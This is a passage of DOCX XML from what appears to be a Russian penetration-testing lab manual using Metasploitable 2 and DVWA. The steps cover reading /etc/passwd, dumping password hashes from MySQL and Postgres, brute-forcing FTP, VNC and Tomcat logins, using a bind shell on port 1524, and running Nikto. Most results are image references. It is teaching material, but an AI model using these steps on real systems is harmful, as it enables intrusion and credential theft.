      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> на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2.</w:t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6F9A571" wp14:editId="024C90AF">
            <wp:extent cx="5940115" cy="1854200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="29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6. Вывести список баз данных.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5F9D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3DEC489" wp14:editId="34269131">
            <wp:extent cx="5940115" cy="1955800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="311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F9D" w:rsidRDefault="005F5F9D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7. Получить содержимое /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>etc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passwd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B3E881F" wp14:editId="48F8C289">
            <wp:extent cx="3762375" cy="228600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="35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C0C57A6" wp14:editId="208B2C29">
            <wp:extent cx="4933573" cy="5020733"/>
            <wp:effectExtent l="0" t="0" r="635" b="8890"/>
            <wp:docPr id="26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102"/>
                    <a:srcRect b="2468"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4931576" cy="501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8. Создать пользователя.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5F9D" w:rsidRDefault="00EF49CB" w:rsidP="005F5F9D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EFFACA8" wp14:editId="118F959B">
            <wp:extent cx="4829175" cy="733425"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="27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9. Получить список пользователей и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>хешей</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> паролей.</w:t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1A61781" wp14:editId="7BE08547">
            <wp:extent cx="5572125" cy="1752600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="31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10. Выполнить аналогичные действия для </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Postgres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AFEDFD8" wp14:editId="5EDE45B9">
            <wp:extent cx="5940115" cy="1879600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="29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1D5D899" wp14:editId="23E32533">
            <wp:extent cx="5940115" cy="2743200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="35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2634EF0" wp14:editId="66D831BD">
            <wp:extent cx="5940115" cy="2959100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="28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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="4EB84A2E" wp14:editId="0F029A1C">
            <wp:extent cx="5940115" cy="1104900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="32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F9D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DF821FD" wp14:editId="033C94FF">
            <wp:extent cx="5248275" cy="2057400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="30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5F5F9D">
      <w:r w:rsidRPr="00EF49CB">
        <w:t xml:space="preserve">Список пользователей и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:t>хешей</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:t xml:space="preserve"> паролей:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="00E11CC9">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBd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974137B" wp14:editId="351C1FF0">
            <wp:extent cx="3829050" cy="1190625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="27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b w:val="0"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc107507615"/>
      <w:bookmarkStart w:id="30" w:name="_Toc107513734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4.5. Парольные атаки на различные сервисы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
      <w:bookmarkEnd w:id="30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подбирать пароли к различным сервисам.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Задание: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п</w:t>
      </w:r>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">осмотреть результаты раздела </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Поиск целей</w:t>
      </w:r>
      <w:r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 xml:space="preserve"> веб-интерфейса </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Сканер-ВС</w:t>
      </w:r>
      <w:r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>, определить порты, к которым возможно интерактивное подключение (или использовать для этих целей NMAP);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о</w:t>
      </w:r>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">бнаружить и подключиться к командным оболочкам, которые не требуют авторизации;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н</w:t>
      </w:r>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">айти модули в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Metasploit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Framework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для подбора паролей к FTP, TOMCAT, VNC;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п</w:t>
      </w:r>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ровести подбор паролей, используя раздел </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Эксплуатация</w:t>
      </w:r>
      <w:r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 xml:space="preserve"> веб-интерфейса </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Сканер-ВС</w:t>
      </w:r>
      <w:r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 xml:space="preserve">;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с</w:t>
      </w:r>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> помощью модуля в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Metasploit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Framework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провести инвентаризацию пользователей;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и</w:t>
      </w:r>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">спользуя протокол </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>smb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, проверить, совпадают ли пароли у выявленных учетных записей с именами пользователей. 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Зайти в раздел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Порты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в разделе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Поиск целей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. При необходимости, отфильтровать порты по IP-адресу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CA36FFF" wp14:editId="450C5E28">
            <wp:extent cx="5786586" cy="2956850"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="30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194" cy="2955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2. Перейти на вкладку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Сетевой аудит паролей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в разделе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Эксплуатация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 Создать новый подбор паролей.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11BE01A" wp14:editId="65711697">
            <wp:extent cx="5940115" cy="2463800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="29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C4E06DF" wp14:editId="686A8881">
            <wp:extent cx="5940115" cy="2273300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="28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8573670" wp14:editId="24D05476">
            <wp:extent cx="5940115" cy="2895600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="31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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="59DDE8C9" wp14:editId="31384C2D">
            <wp:extent cx="5537200" cy="2048072"/>
            <wp:effectExtent l="0" t="0" r="6350" b="9525"/>
            <wp:docPr id="28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953" cy="2046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ind w:firstLine="708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Результаты поиска паролей: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649AE83" wp14:editId="03B8CF08">
            <wp:extent cx="5469468" cy="2350444"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="322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6261" cy="2349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9. </w:t>
      </w:r>
      <w:r w:rsidR="005F5F9D">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Запуск</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> NMAP и </w:t>
      </w:r>
      <w:r w:rsidR="005F5F9D">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>определение</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005F5F9D">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>портов</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> сервисов, требующих авторизации пользователя.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FD062D8" wp14:editId="686CBA41">
            <wp:extent cx="5064042" cy="3323874"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="30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1984" cy="3322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10. Подключиться к оболочке на порту 1524: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D077E0E" wp14:editId="337BBCBF">
            <wp:extent cx="3943350" cy="847725"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="31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5F5F9D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Шаг 11. Подключиться</w:t>
      </w:r>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> к сервису </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>login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. Введите в команде логин (после запроса – пароля из таблицы с результатами сетевого аудита паролей). </w:t>
      </w:r>
      <w:r w:rsidR="00EF49CB"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B59D062" wp14:editId="2F9BFA92">
            <wp:extent cx="5940115" cy="2755900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="23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12. Найти </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>модули</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> содержащие в своем названии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login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(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>search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login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>).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0C6EEEE" wp14:editId="0AC8D12B">
            <wp:extent cx="5445106" cy="3725334"/>
            <wp:effectExtent l="0" t="0" r="3810" b="8890"/>
            <wp:docPr id="29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106" cy="3725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13. Произвести подбор паролей к FTP-серверу.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67547C9" wp14:editId="3C4FC50F">
            <wp:extent cx="4673602" cy="2747852"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2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8316" cy="2750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0421B4C" wp14:editId="031DE2DE">
            <wp:extent cx="4673602" cy="2551340"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="27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122"/>
                    <a:srcRect t="4010"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4679546" cy="255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14. Произвести подбор пароля к VNC-серверу.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157EB34" wp14:editId="44E6F139">
            <wp:extent cx="4989986" cy="2912534"/>
            <wp:effectExtent l="0" t="0" r="1270" b="2540"/>
            <wp:docPr id="353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618" cy="291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15. Подключиться к VNC-серверу с помощью пароля, найденного выше.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21A042B" wp14:editId="4B1ECB39">
            <wp:extent cx="5940115" cy="1917700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="316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16. Произвести подбор пароля к TOMCAT.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F6A58BE" wp14:editId="1DDB2CF8">
            <wp:extent cx="4964954" cy="3396832"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="2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954" cy="3396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96B7304" wp14:editId="2A285904">
            <wp:extent cx="4980386" cy="2527796"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="24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126"/>
                    <a:srcRect t="10072" b="7434"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4984864" cy="253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17. Получить список пользователей.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CD0D417" wp14:editId="5265506B">
            <wp:extent cx="5940115" cy="2552700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="33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18. При помощи утилиты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hydra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проверить связку </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>msfadmin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msfadmin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3E9CD30" wp14:editId="0B716BB4">
            <wp:extent cx="5940115" cy="2095500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="33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1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc107507616"/>
      <w:bookmarkStart w:id="32" w:name="_Toc107513735"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Раздел 5. Эксплуатация уязвимостей в веб-приложениях</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00401AC4" w:rsidP="00EF49CB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc107507617"/>
      <w:bookmarkStart w:id="34" w:name="_Toc107513736"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Лабораторная работа №5.1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Сканирование уязвимостей в веб-приложениях</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
      <w:bookmarkEnd w:id="34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исследовать веб-приложения для обнаружения потенциально опасных уязвимостей.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Задачи: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определить версии веб-серверов на </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2 с помощью </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>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провести сканирование с помощью сканера </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>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найти страницы, раскрывающие чувствительную информацию;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найти и исследовать открытые директории на сервере.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pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          </w:rPr>
          <w:tag w:val="goog_rdk_22"/>
          <w:id w:val="88127834"/>
        </w:sdtPr>
        <w:sdtContent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Шаг 1. Определение версии веб-сервера. (Последовательность команд: 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netcat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→ HEAD ./ HTTP/1</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          </w:rPr>
          <w:tag w:val="goog_rdk_23"/>
          <w:id w:val="168837612"/>
        </w:sdtPr>
        <w:sdtContent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0→ клавиша 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Enter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дважды).</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="005F5F9D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38CA7FD" wp14:editId="66155B6A">
            <wp:extent cx="3251200" cy="1225032"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="29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 rotWithShape="1">
                    <a:blip r:embed="rId129"/>
                    <a:srcRect b="4295"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3258118" cy="122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2. Запуск сканера </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Nikto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D7AE57F" wp14:editId="1EC33718">
            <wp:extent cx="5330474" cy="3120278"/>
            <wp:effectExtent l="0" t="0" r="3810" b="4445"/>
            <wp:docPr id="363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30"/>
                    <a:srcRect r="8076"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5337137" cy="3124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3. Обнаружение служебной страницы </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>phpinfo.php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</w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="049B32DD" wp14:editId="50FAEEB9">
            <wp:extent cx="4258628" cy="4033412"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="25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8628" cy="4033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4. Обнаружение директории </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>doc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79EFB20" wp14:editId="5914EBB1">
            <wp:extent cx="3991928" cy="3863981"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="35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928" cy="3863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ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc107507618"/>
      <w:bookmarkStart w:id="36" w:name="_Toc107513737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5.2. Подбор паролей в веб-приложениях</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
      <w:bookmarkEnd w:id="36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proofErr w:type="gramStart"/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тестировать надежность парольной защиты в веб-приложениях и использовать локальные </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>http-proxy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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Задание: 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и</w:t>
      </w:r>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">спользуя </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Burp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Suite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провести подбор пароля к форме в DVWA (задача </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Brute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Force</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
